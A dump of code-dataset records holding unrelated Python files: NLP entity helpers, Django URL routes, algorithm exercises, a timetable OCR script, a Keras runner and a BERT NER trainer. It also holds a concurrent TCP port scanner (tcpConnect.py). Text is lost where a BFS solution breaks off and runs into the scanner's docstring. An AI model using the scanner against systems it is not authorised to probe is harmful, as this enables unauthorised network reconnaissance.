else:\n self.tt.load_ht()\n self.tt.typed_words(ht_model=self.model)\n self.tt.save_ht()\n def __del__(self):\n print(\"__del__\")\n class_name = self.__class__.__name__\n print(class_name, '销毁')\n\n # try:\n # self.tt.load_ht(ht_model=self.model)\n # except:\n # self.tt.load_ht()\n # self.tt.typed_words(ht_model=self.model)\n def save(self):\n self.tt.save_ht()\n def release(self):\n del self.tt\n gc.collect()\n pass\n\n def add_entities(self,entity_mention_dict,entity_type_dict):\n \"\"\"\n #添加术语\n entity_mention_dict = {'武磊':['武磊','武球王'],'郜林':['郜林','郜飞机'],'前锋':['前锋'],'上海上港':['上港'],'广州恒大':['恒大'],'单刀球':['单刀'],'寿命':[\"寿命\",'寿1命']}\n entity_type_dict = {'武磊':'球员','郜林':'球员','前锋':'位置','上海上港':'球队','广州恒大':'球队','单刀球':'术语','寿命':'关系词'}\n \"\"\"\n self.tt.ht.add_entities(entity_mention_dict,entity_type_dict)\n self.save()\n def add_entities_one(self,word,mention0,type0=\"实体\"):\n \"\"\"\n 添加一个同义词或者关系词\n word, 所属的同义词 作为roo\n mention0, t关键词\n type0 类型\n\n\n \n \"\"\"\n self.tt.ht.add_new_entity(word, mention0=mention0, type0=type0) # 作为特定类型登录\n self.save()\n def get_entity_rel(self,para):\n \"\"\"基于词典获取实体和关系词\n 并无对应关系\n 返回\n entity_words,rel\n 实体和关系列表\n \"\"\"\n\n rel=[]\n entity_words=[]\n for word, flag in self.tt.ht.posseg(para):\n # print(\"%s:%s\" % (word, flag),end = \" \")\n if flag==\"关系\":\n rel.append(word)\n elif flag==\"实体\":\n entity_words.append(word)\n # print(rel)\n # print(entity_words)\n return entity_words,rel\n def entity_linking(self,para):\n #进行消歧义实体链接\n for span, entity in self.tt.ht.entity_linking(para):\n print(span, entity)\n\n# terry_er=TEntityRel()\n\n# para=\"\"\"\n# 何引丽是中国内蒙古自治区包头市人,中华人民共和国田径运动员\n# \"\"\"\n\n# # #添加实体词和冠词\n# # terry_er.add_entities_one(\"寿命\",'寿1命','关系')\n# # terry_er.add_entities_one(\"边境牧羊犬\",'边境牧羊犬','实体')\n# # terry_er.entity_mention_dict,entity_type_dict)\n# entity_words,rel=terry_er.get_entity_rel(para)\n# print(rel)\n# print(entity_words)\n\n","sub_path":"关系判断/TEntityRel.py","file_name":"TEntityRel.py","file_ext":"py","file_size_in_byte":5319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"167231738","text":"\"\"\"main URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf import settings\n\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom accounts.views import log_in, log_out, SignUpView\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n)\n# from django.contrib.auth.views import LogoutView, PasswordResetView, LoginView, PasswordResetDoneView\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include('core.urls')),\n path('', include('accounts.urls')),\n path('accounts/', include('django.contrib.auth.urls')),\n path('signup/', SignUpView.as_view(), name=\"signup\"),\n path('api-auth/', include('rest_framework.urls')),\n path('api/', include('api.urls')),\n path('cbv/', include('cbv.urls')),\n path('rest-auth/', include('rest_auth.urls')\n ), path('rest-auth/registration/', include('rest_auth.registration.urls')),\n path('api/token/', TokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('api/token/refresh/', TokenRefreshView.as_view(), name='token_refresh')\n # path('login/', log_in, name=\"login\"),\n # path('login/', LoginView.as_view(template_name='accounts/login.html'), name=\"login\"),\n # path('logout/', LogoutView.as_view(), name=\"logout\"),\n # path('reset_password/', PasswordResetView.as_view(\n # template_name='accounts/rest_password.html'), name=\"reset_password\"),\n # path('reset_password/', PasswordResetDoneView.as_view(\n # template_name='accounts/rest_password_done.html'), name=\"password_reset_confirm\")\n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"329615363","text":"# coding:utf-8\n'''\n@Copyright:LintCode\n@Author: monolake\n@Problem: http://www.lintcode.com/problem/reorder-list\n@Language: Python\n@Datetime: 16-11-12 05:31\n'''\n\n\"\"\"\nDefinition of ListNode\nclass ListNode(object):\n\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\"\"\"\nclass Solution:\n \"\"\"\n @param head: The first node of the linked list.\n @return: nothing\n \"\"\"\n def reverse(self, head):\n # write your code here\n current = None\n while head is not None:\n temp = head.next\n head.next = current\n current = head\n head = temp\n return current\n\n def middleNode(self, head):\n # Write your code here\n if head is None:\n return head\n \n fast = head\n slow = head\n \n while fast.next is not None and fast.next.next is not None:\n slow = slow.next\n fast = fast.next.next\n return slow\n \n def reorderList(self, head):\n # write your code here\n if head is None or head.next is None or head.next.next is None:\n return head\n \n midNode = self.middleNode(head)\n newNode = midNode.next\n midNode.next = None\n \n right = self.reverse(newNode)\n \n left = head\n \n dummy = ListNode(-1)\n t3 = dummy\n \n while right:\n t3.next = left\n left = left.next\n t3 = t3.next\n t3.next = right\n right = right.next\n t3 = t3.next\n \n t3.next = left\n \n return dummy.next\n \n \n \n \n","sub_path":"99_reorder-list/reorder-list.py","file_name":"reorder-list.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"224285772","text":"def 
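The reorder-list solution above splits the list at its middle, reverses the back half, and interleaves the two halves. A compact standalone trace of the same split/reverse/merge steps on 1->2->3->4->5, re-implemented here so the sketch runs on its own:

```python
class ListNode:
    def __init__(self, val, next=None):
        self.val, self.next = val, next

def reorder(head):
    if not head or not head.next:
        return head
    # 1. find the middle with slow/fast pointers
    slow = fast = head
    while fast.next and fast.next.next:
        slow, fast = slow.next, fast.next.next
    # 2. detach and reverse the second half
    prev, cur = None, slow.next
    slow.next = None
    while cur:
        nxt = cur.next
        cur.next = prev
        prev, cur = cur, nxt
    # 3. interleave the two halves
    first, second = head, prev
    while second:
        t1, t2 = first.next, second.next
        first.next = second
        second.next = t1
        first, second = t1, t2
    return head

node = reorder(ListNode(1, ListNode(2, ListNode(3, ListNode(4, ListNode(5))))))
while node:
    print(node.val, end=" ")  # 1 5 2 4 3
    node = node.next
```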
foo(num):\n\ti = 1\n\tflag = [False for x in range(10)]\n\twhile(1):\n\t\ttemp = num * i\n\t\twhile(temp != 0):\n\t\t\tflag[temp % 10] = True\n\t\t\ttemp /= 10\n\t\tif all(flag):\n\t\t\treturn num * i\n\t\telse:\n\t\t\ti+=1\n\t\tif(i > 50000):\n\t\t\tbreak\n\treturn -1\n\nwith open(\"A-large.in\") as readfile:\n\twith open (\"output.txt\", \"w\") as writefile:\n\t\tN = int(readfile.readline())\n\t\tfor x in range(N):\n\t\t\tnum = int(readfile.readline())\n\t\t\tif num == 0:\n\t\t\t\twritefile.write(\"Case #\" + str(x+1) + \": INSOMNIA\\n\")\t\n\t\t\telse:\n\t\t\t\tres = foo(num)\n\t\t\t\twritefile.write(\"Case #\" + str(x+1) + \": \" + str(res) + \"\\n\")","sub_path":"codes/CodeJamCrawler/16_0_1_neat/16_0_1_ThomasChen_Counting_Sheep.py","file_name":"16_0_1_ThomasChen_Counting_Sheep.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"432231914","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'''\n\nExemplo sobre tratamento de exceções.\n\nExecute o script e:\n\n- No primeiro teste forneça 2 números inteiros. \n\n- No segundo teste forneça uma letra para um ou para os dois operandos\n\n'''\n\n\ndef sem_tratar(a, b):\n resultado = int(a) + int(b)\n\n print(\"Resultado da soma é: {}\".format(resultado))\n\n\ndef com_tratamento(a, b):\n try:\n\n resultado = int(a) + int(b)\n print(\"Resultado da soma é: {}\".format(resultado))\n\n except ValueError as e:\n print(\"Não foi possível fazer a soma. Veja o erro: {}\".format(e))\n\n\n\n\nif __name__ == '__main__':\n a = input(\"Entre com o primeiro operando: \")\n b = input(\"Entre com o segundo operando: \")\n\n com_tratamento(a, b)\n sem_tratar(a, b)","sub_path":"exemplo07/app-exemplo07.py","file_name":"app-exemplo07.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"25035341","text":"from google.cloud import vision\nimport io\nimport os\nfrom google.oauth2 import service_account\nimport re\nimport sys\n\ncourse = r\"^[A-Z]{4}[0-9]{4}$\"\ntime = r\"^[0-9]{1,2}:[0-9]{2}$\"\n\nclassContent = {}\n\ndate = []\ndateList = ['Monday','Tuesday','Wednesday','Thursday','Friday','Sat','Sun']\ndateScanned = []\n\ndiscarded = ['am','pm','Hour']\n\ntimeDict = {}\ntimeList = []\n\nscanFrom_y = 0\nscanFrom_x = 0\nscanEnd_x = 0\nscanEnd_y = 0\n\ntimeGap = 0\n\ndef printInfo(text):\n print('\\n\"{}\"'.format(text.description))\n vertices = (['({},{})'.format(vertex.x, vertex.y)\n for vertex in text.bounding_poly.vertices])\n print('bounds: {}'.format(','.join(vertices)))\n\ndef setUpTimeCol(text):\n # printInfo(text)\n padding = 5\n\n timeDict[text.description] = {}\n upper = text.bounding_poly.vertices[0].y if (text.bounding_poly.vertices[0].y > text.bounding_poly.vertices[1].y) else text.bounding_poly.vertices[1].y\n\n timeDict[text.description]['start'] = upper + padding\n timeList.append(text.description)\n\n if (len(timeList) == 2):\n global timeGap\n timeGap = timeDict[timeList[1]]['start'] - timeDict[timeList[0]]['start']\n\ndef convertDateToNum(text):\n if (text == \"Monday\"):\n return 0\n if (text == \"Tuesday\"):\n return 1\n if (text == \"Wednesday\"):\n return 2\n if (text == \"Thursday\"):\n return 3\n if (text == \"Friday\"):\n return 4\n if (text == \"Sat\"):\n return 5\n\ndef withinTable(poly):\n\n min_x = poly[0].x if (poly[0].x < poly[3].x) else poly[3].x\n max_x = poly[1].x if (poly[1].x > poly[2].x) else poly[2].x\n\n min_y = poly[0].y if 
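A portability note on the sheep-counting loop above: under Python 3, `temp /= 10` makes `temp` a float, so `flag[temp % 10]` raises `TypeError` (list indices must be integers); the submission presumably ran under Python 2. Floor division keeps the digit extraction integral:

```python
def last_number_with_all_digits(num):
    # Same accumulate-digits-over-multiples loop, Python-3 safe.
    seen = [False] * 10
    i = 1
    while i <= 50000:
        temp = num * i
        while temp:
            seen[temp % 10] = True
            temp //= 10            # /= would turn temp into a float here
        if all(seen):
            return num * i
        i += 1
    return -1

print(last_number_with_all_digits(1))  # 10: by then 1..10 showed every digit
```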
(poly[0].y < poly[1].y) else poly[1].y\n max_y = poly[2].y if (poly[2].y > poly[3].y) else poly[3].y\n\n if (scanFrom_x < min_x and scanEnd_x > max_x and scanFrom_y < min_y and scanEnd_y > max_y):\n return True\n else:\n return False\n\ndef initDate():\n date.append({\"dateName\": \"Monday\", \"start_x\": 0, \"end_x\": 0, 'content': []})\n date.append({\"dateName\": \"Tuesday\", \"start_x\": 0, \"end_x\": 0, 'content': []})\n date.append({\"dateName\": \"Wednesday\", \"start_x\": 0, \"end_x\": 0, 'content': []})\n date.append({\"dateName\": \"Thursday\", \"start_x\": 0, \"end_x\": 0, 'content': []})\n date.append({\"dateName\": \"Friday\", \"start_x\": 0, \"end_x\": 0, 'content': []})\n\ndef setUpDateCol(text):\n # printInfo(text)\n\n if (text.description == 'Sat' or text.description == 'Sun'):\n\n if (text.description == 'Sat'):\n prevDate = convertDateToNum(text.description) - 1\n date[prevDate]['end_x'] = text.bounding_poly.vertices[0].x\n global scanEnd_x\n scanEnd_x = text.bounding_poly.vertices[0].x\n\n return\n\n # print(\"ENTER here\", text.description, text.bounding_poly.vertices[0].x)\n # find the start_x coordidate of thisDate\n thisDate = convertDateToNum(text.description)\n date[thisDate]['start_x'] = text.bounding_poly.vertices[0].x\n\n # this start_x of thisDate will be the end_x of prevDate\n if (thisDate > 0):\n prevDate = thisDate - 1\n date[prevDate]['end_x'] = text.bounding_poly.vertices[0].x\n\n dateScanned.append(text.description)\n\n tempScanFrom = text.bounding_poly.vertices[2].y if (text.bounding_poly.vertices[2].y > text.bounding_poly.vertices[3].y) else text.bounding_poly.vertices[3].y\n\n global scanFrom_y\n global scanFrom_x\n\n if (text.description == 'Monday'):\n scanFrom_x = text.bounding_poly.vertices[0].x - 5 # - 5 for padding\n\n if (scanFrom_y < tempScanFrom):\n scanFrom_y = tempScanFrom\n\ndef assignDate(text):\n\n for day in date:\n if (day['start_x'] < text.bounding_poly.vertices[0].x and day['end_x'] > text.bounding_poly.vertices[1].x):\n day['content'].append(text.description)\n\ndef detect_text(path):\n \"\"\"Detects text in the file.\"\"\"\n from google.cloud import vision\n client = vision.ImageAnnotatorClient()\n\n with io.open(path, 'rb') as image_file:\n content = image_file.read()\n\n image = vision.types.Image(content=content)\n\n response = client.text_detection(image=image)\n texts = response.text_annotations\n\n print('Texts:')\n\n # Set up time and date col, bound of the table to be scanned\n for text in texts:\n if (len(text.description) > 25):\n continue\n\n elif (re.match(time,text.description)):\n setUpTimeCol(text)\n\n elif text.description in dateList:\n setUpDateCol(text)\n\n global scanEnd_y\n scanEnd_y = timeDict[timeList[-1]]['start'] + timeGap\n\n # Ok, after we have the table bounds, only get the content within that bound\n for text in texts:\n if (len(text.description) > 25):\n continue\n\n if (withinTable(text.bounding_poly.vertices)):\n assignDate(text)\n\ndef printDateInfo():\n for day in date:\n print(day['dateName'],\": \")\n print(day['content'])\n\n\nif __name__ == '__main__':\n\n initDate()\n\n dir_path = os.path.dirname(os.path.realpath(__file__))\n\n # file_name = dir_path+\"/TestData\"+\"/ben.png\" # CHECKED dates, UNCHECKED time\n # file_name = dir_path+\"/TestData\"+\"/sean_1.png\" # CHECKED dates, UNCHECKED time\n # file_name = dir_path+\"/TestData\"+\"/sean_2.png\" # CHECKED dates, UNCHECKED time\n file_name = dir_path+\"/TestData\"+\"/sean_3.png\" # CHECKED dates, UNCHECKED time\n # file_name = 
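`withinTable` above reduces each Vision API bounding polygon to an axis-aligned min/max box and keeps only tokens that fall inside the scan window. The same containment test as a standalone function over plain `(x, y)` tuples (the sample vertices and window are made up):

```python
def bounding_box(vertices):
    xs = [x for x, _ in vertices]
    ys = [y for _, y in vertices]
    return min(xs), min(ys), max(xs), max(ys)

def within(vertices, region):
    # region = (x0, y0, x1, y1) scan window, like scanFrom_*/scanEnd_* above
    min_x, min_y, max_x, max_y = bounding_box(vertices)
    x0, y0, x1, y1 = region
    return x0 < min_x and y0 < min_y and x1 > max_x and y1 > max_y

word = [(120, 210), (160, 210), (160, 230), (120, 230)]  # made-up token
print(within(word, (100, 200, 800, 600)))  # True
print(within(word, (100, 200, 150, 600)))  # False: spills past x1
```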
dir_path+\"/TestData\"+\"/timetable-fullscreen.png\" # CHECKED dates, UNCHECKED time\n # file_name = dir_path+\"/TestData\"+\"/timetable-narrow-zoom.png\" # CHECKED dates, UNCHECKED time\n # file_name = dir_path+\"/TestData\"+\"/timetable-rotated.png\" # CHECKED dates, UNCHECKED time\n # file_name = dir_path+\"/TestData\"+\"/timetable-small.png\" # FAIL BOTH\n # file_name = dir_path+\"/TestData\"+\"/timetable-tall.png\" # CHECKED dates, UNCHECKED time\n # file_name = dir_path+\"/TestData\"+\"/timetable.png\" # FAIL BOTH\n # file_name = dir_path+\"/TestData\"+\"/timetable-wide.png\" # FAIL BOTH\n\n detect_text(file_name)\n\n # print()\n # print(\"scanFrom_x: \",scanFrom_x, \"scanFrom_y: \",scanFrom_y, 'scanEnd_x: ', scanEnd_x, 'scanEnd_y: ',scanEnd_y)\n print()\n printDateInfo()\n # print(timeDict)\n","sub_path":"OCR/Timetable/ocr.py","file_name":"ocr.py","file_ext":"py","file_size_in_byte":6157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"588350255","text":"import sys; input=sys.stdin.readline\nm, n = map(int, input().split())\narr = [[0]*m for _ in range(n)]; queue = []\nfor i in range(n):\n tmp = list(map(int, input().split()))\n for j in range(m):\n arr[i][j] = tmp[j]\n if tmp[j] == 1: queue.append((i, j))\nqueue = [queue]; count = 0\nwhile queue:\n Q = queue.pop(0)\n tmp = []\n count += 1\n for x, y in Q:\n for i, j in (-1, 0), (1, 0), (0, -1), (0, 1):\n xx = x+i; yy = y+j\n if 0<=xx --port_count=) [--timeout=]\n\nOptions:\n --target= target\n --port_count= port count default 65535\n --timeout= timeout for each tcp connection attempt\n\"\"\"\nimport socket\nfrom docopt import docopt\nimport concurrent.futures\n\n\ndef tcp_connect(target, port, timeout=1):\n \"\"\"\n Generate a list of URLs from a given subnet in CIDR notation\n\n Args:\n subnet: A subnet in CIDR notation ex. 
192.168.1.0/24\n\n Returns:\n List of IPv4 addresses\n \"\"\"\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(int(timeout))\n s.connect((target, port))\n print(\"connected: {}:{}\".format(target,port))\n return \"{}:{}\".format(target,port)\n except:\n print(\"failed: {}:{}\".format(target,port))\n pass\n\ndef tcp_connect_concurrent(target, port_count, timeout=1):\n \"\"\"\n Concurrently test tcp connections\n\n Args:\n target: target ipv4 address\n port_count: The number of ports to test starting at 1\n\n Returns:\n List of successful ports\n \"\"\"\n results_list = []\n port_count = int(port_count)\n if port_count < 0:\n port_count = 1000\n elif port_count > 65535:\n port_count = 65535\n with concurrent.futures.ProcessPoolExecutor(max_workers=50) as pool:\n results = {pool.submit(tcp_connect, target, port,timeout): port for port in range(port_count)}\n for future in concurrent.futures.as_completed(results):\n if future.result():\n results_list.append(future.result())\n return results_list\n\ndef main():\n opts = docopt(__doc__)\n if opts['--timeout']:\n res = tcp_connect_concurrent(opts['--target'], opts['--port_count'], opts['--timeout'])\n else:\n res = tcp_connect_concurrent(opts['--target'], opts['--port_count'])\n print(res)\n\nif __name__ == '__main__':\n main()\n","sub_path":"tcpConnect.py","file_name":"tcpConnect.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"717877","text":"import datetime\nfrom pathlib import Path\nfrom gooey import Gooey, GooeyParser\n\nfrom .model import KerasAppBaseModel\nfrom .build import build\nfrom .train import TrainConfig, train_config_parser, train # , train_config\nfrom .test import TestConfig, test_config_parser, test\nfrom .generator import generator\n\nfrom keras import backend as K\n\n# from . import (train_config,\n# build,\n# build_config,\n# train,\n# config\n# test, test_config,\n# generator, generator_config,\n# )\n\n\ndef run_parser(\n parser: GooeyParser = GooeyParser(),\n title=\"Run Setting\",\n train_config=TrainConfig(),\n train_configs={},\n test_config=TestConfig(),\n test_configs={},\n ) -> GooeyParser:\n\n subs = parser.add_subparsers()\n\n test_parser = subs.add_parser('test')\n test_config_parser(test_parser, test_config=test_config)\n\n for k, v in train_configs.items():\n train_parser = subs.add_parser(k)\n train_config_parser(train_parser, train_config=v)\n\n train_parser = subs.add_parser('train')\n train_config_parser(train_parser, train_config=train_config)\n\n return parser\n\n\n# Should be fixed. 
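tcp_connect's docstring above was evidently copied from a CIDR helper; it describes subnets, not TCP probes. Since each worker just blocks on the network, a thread pool usually fits better than 50 processes; a sketch under that assumption (names are mine):

import socket
from concurrent.futures import ThreadPoolExecutor, as_completed

def probe(target, port, timeout=1.0):
    # Returns "host:port" when the TCP handshake succeeds, else None.
    try:
        with socket.create_connection((target, port), timeout=timeout):
            return "{}:{}".format(target, port)
    except OSError:
        return None

def scan(target, ports, timeout=1.0):
    # I/O-bound waiting releases the GIL, so threads scale fine here.
    with ThreadPoolExecutor(max_workers=50) as pool:
        futures = [pool.submit(probe, target, p, timeout) for p in ports]
        return [f.result() for f in as_completed(futures) if f.result()]

# e.g. scan("127.0.0.1", range(1, 1025)); note the original's
# range(port_count) starts at port 0, which is not a connectable port.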
It is directly used in gui/frame.py\ndef run(model: KerasAppBaseModel, config, train_config: TrainConfig = TrainConfig()):\n (build_cmds, build_args,\n run_cmds, run_args,\n generator_cmds, generator_args,\n stream) = config\n run_cmd = run_cmds[0]\n\n # model = build.build(build_args)\n # model.build(build_args)\n stream.put(('Building...', None, None))\n build(model, build_args)\n\n stream.put(('Loading...', None, None))\n if run_args.load_pretrained_weights or run_args.load_pretrained_file:\n if run_args.load_pretrained_weights == \"imagenet\":\n # Start from ImageNet trained weights\n weights_path = model.get_imagenet_weights()\n elif run_args.load_pretrained_weights == \"last\":\n # Find last trained weights\n weights_path = model.find_last()\n else:\n weights_path = run_args.load_pretrained_file\n\n model.load_weights(weights_path, by_name=True)\n\n stream.put(('Generating...', None, None))\n generator_cmd = generator_cmds[0]\n\n train_generator, val_generator = generator(generator_cmd, generator_args)\n\n if 'train' in run_cmd:\n stream.put(('Training', None, None))\n train_args = run_args\n train_config.update(train_args)\n # model.train(train_args, train_generator, val_generator)\n train(model, train_config, train_generator, val_generator, stream)\n elif 'test' == run_cmd:\n stream.put(('Testing', None, None))\n test_args = run_args\n test_generator = val_generator\n\n test(model, test_args, test_generator, stream)\n K.clear_session()\n","sub_path":"model/keras_applications/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"253166894","text":"#/usr/bin/env python\n# for.py\nimport os\n\nskipfolders = ['chap8', 'chap10']\n\nfor foldername, subfolders, filenames in os.walk(\"C:\\\\Users\\\\danie\\\\OneDrive\\\\Documents\\\\Python\\\\automate_boring_stuff\"):\n for subfolder in subfolders:\n if subfolder in skipfolders:\n continue\n print(subfolder)","sub_path":"Automate_The_Boring_Stuff/chap9/for.py","file_name":"for.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"648830630","text":"# Implementation via huggingface transformers\r\n# setup 2\r\n\r\nimport json\r\nimport numpy as np\r\nfrom seqeval.metrics import f1_score, classification_report\r\nfrom seqeval.metrics.v1 import precision_recall_fscore_support\r\nfrom seqeval.scheme import BILOU\r\nimport datetime as dt\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn import model_selection\r\nfrom transformers import DistilBertTokenizerFast, DistilBertTokenizer, DistilBertForTokenClassification, Trainer, TrainingArguments, BertTokenizerFast, BertForTokenClassification, AutoTokenizer, AutoModelForTokenClassification, AutoModel\r\nimport torch\r\nfrom sklearn.preprocessing import MultiLabelBinarizer\r\nimport time\r\nimport os\r\nfrom datasets import load_dataset, load_metric\r\nfrom typing import Dict\r\n\r\n# load data texts and labels\r\nfor line in open('data/texts.json', 'r'):\r\n texts = json.loads(line)\r\nfor line in open('data/tags.json', 'r'):\r\n tags = json.loads(line)\r\n\r\n\r\ndef encode_tags2(tags, encodings):\r\n labels = [[tag2id[tag] for tag in doc] for doc in tags]\r\n encoded_labels = []\r\n for doc_labels, doc_offset, doc_input_ids in zip(labels, encodings.offset_mapping, encodings.input_ids):\r\n # create an empty array of -100\r\n doc_enc_labels = 
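The weight-selection branch in run() reduces to a small lookup. A sketch assuming the same KerasAppBaseModel interface (get_imagenet_weights, find_last) seen above:

def resolve_weights(model, run_args):
    # "imagenet" -> bundled ImageNet weights, "last" -> most recent
    # checkpoint, anything else -> an explicit file path.
    if run_args.load_pretrained_weights == "imagenet":
        return model.get_imagenet_weights()
    if run_args.load_pretrained_weights == "last":
        return model.find_last()
    return run_args.load_pretrained_file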
np.ones(len(doc_offset),dtype=int) * -100\r\n arr_offset = np.array(doc_offset)\r\n\r\n # set labels whose first offset position is 0 and the second is not 0\r\n doc_enc_labels[(arr_offset[:,0] == 0) & (arr_offset[:,1] != 0)] = doc_labels\r\n \r\n #labelling the special tokens CLS and SEP:\r\n doc_enc_labels[0] = tag2id['O']\r\n last_index = doc_input_ids.index(102)\r\n doc_enc_labels[last_index] = tag2id['O']\r\n \r\n # adjusting label positions to the created subtokens\r\n for i in range(last_index):\r\n if doc_enc_labels[i] == -100:\r\n if 'B-' in id2tag[doc_enc_labels[i-1]]:\r\n doc_enc_labels[i] = tag2id[id2tag[doc_enc_labels[i-1]].replace('B-','I-')]\r\n elif 'L-' in id2tag[doc_enc_labels[i-1]]:\r\n doc_enc_labels[i-1] = tag2id[id2tag[doc_enc_labels[i-1]].replace('L-','I-')]\r\n doc_enc_labels[i] = tag2id[id2tag[doc_enc_labels[i-1]].replace('I-','L-')]\r\n elif 'U-' in id2tag[doc_enc_labels[i-1]]:\r\n doc_enc_labels[i-1] = tag2id[id2tag[doc_enc_labels[i-1]].replace('U-','B-')]\r\n doc_enc_labels[i] = tag2id[id2tag[doc_enc_labels[i-1]].replace('B-','L-')]\r\n else:\r\n doc_enc_labels[i] = tag2id[id2tag[doc_enc_labels[i-1]]]\r\n encoded_labels.append(doc_enc_labels.tolist())\r\n\r\n return encoded_labels \r\n\r\nclass NERDataset(torch.utils.data.Dataset):\r\n def __init__(self, encodings, labels):\r\n self.encodings = encodings\r\n self.labels = labels\r\n\r\n def __getitem__(self, idx):\r\n item = {key: torch.tensor(val[idx]) for key, val in self.encodings.items()}\r\n item['labels'] = torch.tensor(self.labels[idx])\r\n return item\r\n\r\n def __len__(self):\r\n return len(self.labels)\r\n \r\ndef compute_metrics(pred):\r\n labels = pred.label_ids\r\n preds = pred.predictions.argmax(-1)\r\n p = [[id2tag[p] for p in pre] for pre in preds]\r\n id2tag[-100] = '-100'# requires to be fixed!\r\n l = [[id2tag[p] for p in pre] for pre in labels]\r\n \r\n r = []\r\n for i in range(len(l)):\r\n for j in range(len(l[i])):\r\n if l[i][j] == '-100':\r\n r.append((i,j))\r\n r.reverse()\r\n for (i,j) in r:\r\n del p[i][j]\r\n del l[i][j]\r\n \r\n result = classification_report(y_true=l, y_pred=p, scheme=BILOU, mode='strict')\r\n print(result)\r\n precision, recall, f1, _ = precision_recall_fscore_support(y_true=l, y_pred=p, average=\"weighted\", scheme=BILOU)\r\n \r\n return {\r\n 'precision': precision,\r\n 'recall': recall,\r\n 'f1': f1,}\r\n \r\ndef model_init():\r\n return BertForTokenClassification.from_pretrained(\"bert-base-cased\", num_labels=len(unique_tags), return_dict=True)\r\n\r\ndef fix_tag_problems(tags, texts):\r\n # removes sentences with overlapping entities\r\n # should only occur due to problems within the data\r\n rem = []\r\n for i in range(len(tags)):\r\n for j in range(len(tags[i])):\r\n if tags[i][j]=='-':\r\n rem.append(i)\r\n rem.reverse()\r\n for obj in rem:\r\n del tags[obj]\r\n del texts[obj]\r\n return tags\r\n \r\n\r\n# main:\r\n \r\ntags = fix_tag_problems(tags, texts) \r\n\r\n# 80/20 train-test split of the data\r\ntrain_texts, val_texts, train_tags, val_tags = train_test_split(texts, tags, test_size=.2, random_state = 51)\r\n \r\n# integer representation of the labels with positional tagging\r\nunique_tags = set(tag for doc in tags for tag in doc)\r\ntag2id = {'B-NEG_FINDINGS': 0,\r\n 'I-FAMILY': 1,\r\n 'B-ETHNICITY': 2,\r\n 'L-FAMILY': 3,\r\n 'U-MEDICATION': 4,\r\n 'B-SYMPTOMS': 5,\r\n 'U-DIAGNOSIS': 6,\r\n 'L-GENDER': 7,\r\n 'O': 8,\r\n 'I-GENETICS': 9,\r\n 'I-GENDER': 10,\r\n 'B-MEDICATION': 11,\r\n 'I-BIOCHEMICAL': 12,\r\n 'I-NEG_FINDINGS': 13,\r\n 
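encode_tags2() supervises every sub-token, rewriting BILOU prefixes across wordpiece boundaries. The more common alternative labels only the first sub-token of each word and masks the rest with -100 so the loss ignores them; a sketch under that convention:

import numpy as np

def align_labels(doc_labels, doc_offsets):
    # doc_offsets: (start, end) character offsets per sub-token; an offset
    # starting at 0 with nonzero end marks the first sub-token of a word.
    enc = np.full(len(doc_offsets), -100, dtype=int)
    first_subtoken = np.array([s == 0 and e != 0 for s, e in doc_offsets])
    enc[first_subtoken] = doc_labels
    return enc.tolist()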
